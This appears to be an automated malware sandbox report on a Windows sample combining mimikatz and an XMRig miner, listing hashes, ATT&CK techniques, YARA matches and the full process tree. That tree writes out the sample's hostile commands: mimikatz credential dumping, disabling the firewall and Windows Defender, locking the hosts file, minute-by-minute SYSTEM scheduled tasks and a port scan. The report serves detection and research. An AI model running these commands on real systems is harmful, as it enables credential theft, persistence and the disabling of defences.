mimikatz | 30cdb0ba56f3d39e37fe4b770900c55fe0214bc4cb7543061975d7a3aa8b8a32

Analysis

max time kernel
7s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2024 12:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe
Size

10.0MB
MD5

d1b65504fe84976f39d3002cd767363e
SHA1

71c61d9040bcd1b9aed1e6cc8e41f5289856ede9
SHA256

30cdb0ba56f3d39e37fe4b770900c55fe0214bc4cb7543061975d7a3aa8b8a32
SHA512

5d090b86bd70939140418c6b5f4c8ce4deba40b3a63445926c39b923afbb60ffbad721e48b414d0ddd4cbb65413faa81e78d23437835e957a1dc0239d934c016
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (30316) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4644-177-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-182-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-202-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-211-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-228-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-235-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-247-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-253-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-263-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-280-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-282-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig
behavioral2/memory/4644-284-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/464-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/464-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
C:\Windows\uuzvyssy\pmesiis.exe	mimikatz
behavioral2/memory/1188-137-0x00007FF76F3C0000-0x00007FF76F4AE000-memory.dmp	mimikatz

Drops file in Drivers directory 1 IoCs

Processes:

pmesiis.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts pmesiis.exe
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

3104 netsh.exe
1512 netsh.exe
Executes dropped EXE 2 IoCs

Processes:

pmesiis.exepmesiis.exe

pid process

2200 pmesiis.exe
1504 pmesiis.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

63 ifconfig.me
64 ifconfig.me
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	pmesiis.exe

pid	process
3104	netsh.exe
1512	netsh.exe

pid	process
2200	pmesiis.exe
1504	pmesiis.exe

flow	ioc
63	ifconfig.me
64	ifconfig.me

UPX packed file 36 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\tggeyyzfb\Corporate\vfshost.exe	upx
behavioral2/memory/1188-136-0x00007FF76F3C0000-0x00007FF76F4AE000-memory.dmp	upx
behavioral2/memory/1188-137-0x00007FF76F3C0000-0x00007FF76F4AE000-memory.dmp	upx
behavioral2/memory/4472-156-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
C:\Windows\TEMP\tggeyyzfb\nynubbqbs.exe	upx
behavioral2/memory/4472-159-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
C:\Windows\TEMP\nbehzqchy\bfqlww.exe	upx
behavioral2/memory/4644-163-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/3684-170-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/3648-174-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/4644-177-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/3928-179-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/4644-182-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/400-184-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/4712-188-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/628-192-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/1816-196-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/2316-200-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/4644-202-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/2880-205-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/4048-209-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/4644-211-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/4180-214-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/844-218-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/1944-226-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/4644-228-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/2032-230-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/1248-232-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/3840-234-0x00007FF779520000-0x00007FF77957B000-memory.dmp	upx
behavioral2/memory/4644-235-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/4644-247-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/4644-253-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/4644-263-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/4644-280-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/4644-282-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx
behavioral2/memory/4644-284-0x00007FF77D330000-0x00007FF77D450000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

Processes:

2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe

description	ioc	process
File created	C:\Windows\uuzvyssy\pmesiis.exe	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\uuzvyssy\pmesiis.exe	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1316 sc.exe
2332 sc.exe
412 sc.exe
2644 sc.exe

pid	process
1316	sc.exe
2332	sc.exe
412	sc.exe
2644	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.execmd.exepmesiis.execacls.execmd.exenetsh.exenetsh.exepmesiis.execacls.execacls.exePING.EXEcmd.execmd.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pmesiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pmesiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

3648 cmd.exe
3684 PING.EXE

pid	process
3648	cmd.exe
3684	PING.EXE

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
C:\Windows\uuzvyssy\pmesiis.exe	nsis_installer_2
C:\Windows\tggeyyzfb\eymeuqibh\wpcap.exe	nsis_installer_1
C:\Windows\tggeyyzfb\eymeuqibh\wpcap.exe	nsis_installer_2

Modifies data under HKEY_USERS 5 IoCs

Processes:

pmesiis.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	pmesiis.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	pmesiis.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	pmesiis.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	pmesiis.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	pmesiis.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3684 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5088 schtasks.exe
3488 schtasks.exe
3380 schtasks.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe

pid process

464 2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe

pid	process
3684	PING.EXE

pid	process
5088	schtasks.exe
3488	schtasks.exe
3380	schtasks.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exepmesiis.exepmesiis.exe

description	pid	process
Token: SeDebugPrivilege	464	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2200	pmesiis.exe
Token: SeDebugPrivilege	1504	pmesiis.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exepmesiis.exepmesiis.exe

pid	process
464	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe
464	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe
2200	pmesiis.exe
2200	pmesiis.exe
1504	pmesiis.exe
1504	pmesiis.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.execmd.exepmesiis.execmd.exe

description	pid	process	target process
PID 464 wrote to memory of 3648	464	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe	cmd.exe
PID 464 wrote to memory of 3648	464	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe	cmd.exe
PID 464 wrote to memory of 3648	464	2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe	cmd.exe
PID 3648 wrote to memory of 3684	3648	cmd.exe	PING.EXE
PID 3648 wrote to memory of 3684	3648	cmd.exe	PING.EXE
PID 3648 wrote to memory of 3684	3648	cmd.exe	PING.EXE
PID 3648 wrote to memory of 2200	3648	cmd.exe	pmesiis.exe
PID 3648 wrote to memory of 2200	3648	cmd.exe	pmesiis.exe
PID 3648 wrote to memory of 2200	3648	cmd.exe	pmesiis.exe
PID 1504 wrote to memory of 4680	1504	pmesiis.exe	cmd.exe
PID 1504 wrote to memory of 4680	1504	pmesiis.exe	cmd.exe
PID 1504 wrote to memory of 4680	1504	pmesiis.exe	cmd.exe
PID 4680 wrote to memory of 5052	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 5052	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 5052	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 2360	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 2360	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 2360	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 1944	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 1944	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 1944	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 4696	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 4696	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 4696	4680	cmd.exe	cacls.exe
PID 4680 wrote to memory of 4956	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 4956	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 4956	4680	cmd.exe	cmd.exe
PID 4680 wrote to memory of 2744	4680	cmd.exe	Conhost.exe
PID 4680 wrote to memory of 2744	4680	cmd.exe	Conhost.exe
PID 4680 wrote to memory of 2744	4680	cmd.exe	Conhost.exe
PID 1504 wrote to memory of 2368	1504	pmesiis.exe	netsh.exe
PID 1504 wrote to memory of 2368	1504	pmesiis.exe	netsh.exe
PID 1504 wrote to memory of 2368	1504	pmesiis.exe	netsh.exe
PID 1504 wrote to memory of 888	1504	pmesiis.exe	netsh.exe
PID 1504 wrote to memory of 888	1504	pmesiis.exe	netsh.exe
PID 1504 wrote to memory of 888	1504	pmesiis.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-13_d1b65504fe84976f39d3002cd767363e_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uuzvyssy\pmesiis.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3648
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3684
- - C:\Windows\uuzvyssy\pmesiis.exe
    C:\Windows\uuzvyssy\pmesiis.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2200

C:\Windows\uuzvyssy\pmesiis.exe
C:\Windows\uuzvyssy\pmesiis.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5052
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2744
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2368
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:888
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\tggeyyzfb\eymeuqibh\wpcap.exe /S
  2⤵
  PID:4384
- - C:\Windows\tggeyyzfb\eymeuqibh\wpcap.exe
    C:\Windows\tggeyyzfb\eymeuqibh\wpcap.exe /S
    3⤵
    PID:1628
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      PID:4548
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:5072
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      PID:1460
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:3408
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      PID:3616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:5008
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:924
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:4144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:4068
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4448
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:3036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:3392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\tggeyyzfb\eymeuqibh\fuiegeqsm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tggeyyzfb\eymeuqibh\Scant.txt
  2⤵
  PID:2896
- - C:\Windows\tggeyyzfb\eymeuqibh\fuiegeqsm.exe
    C:\Windows\tggeyyzfb\eymeuqibh\fuiegeqsm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tggeyyzfb\eymeuqibh\Scant.txt
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\tggeyyzfb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tggeyyzfb\Corporate\log.txt
  2⤵
  PID:4940
- - C:\Windows\tggeyyzfb\Corporate\vfshost.exe
    C:\Windows\tggeyyzfb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hcwibtmyc" /ru system /tr "cmd /c C:\Windows\ime\pmesiis.exe"
  2⤵
  PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "hcwibtmyc" /ru system /tr "cmd /c C:\Windows\ime\pmesiis.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tuesyyviu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uuzvyssy\pmesiis.exe /p everyone:F"
  2⤵
  PID:2944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "tuesyyviu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uuzvyssy\pmesiis.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ybqcwyuem" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nbehzqchy\bfqlww.exe /p everyone:F"
  2⤵
  PID:4100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "ybqcwyuem" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nbehzqchy\bfqlww.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5088
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:1464
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:2660
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:1268
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:3968
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:4472
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:3940
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:1960
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4660
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:5016
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:1452
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4004
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:2712
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:3928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:2324
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:1092
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:856
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:784
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:3336
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:4524
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:952
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:2136
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:2552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:2332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:1220
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:2644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:1144
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:4692
- - C:\Windows\SysWOW64\sc.exe
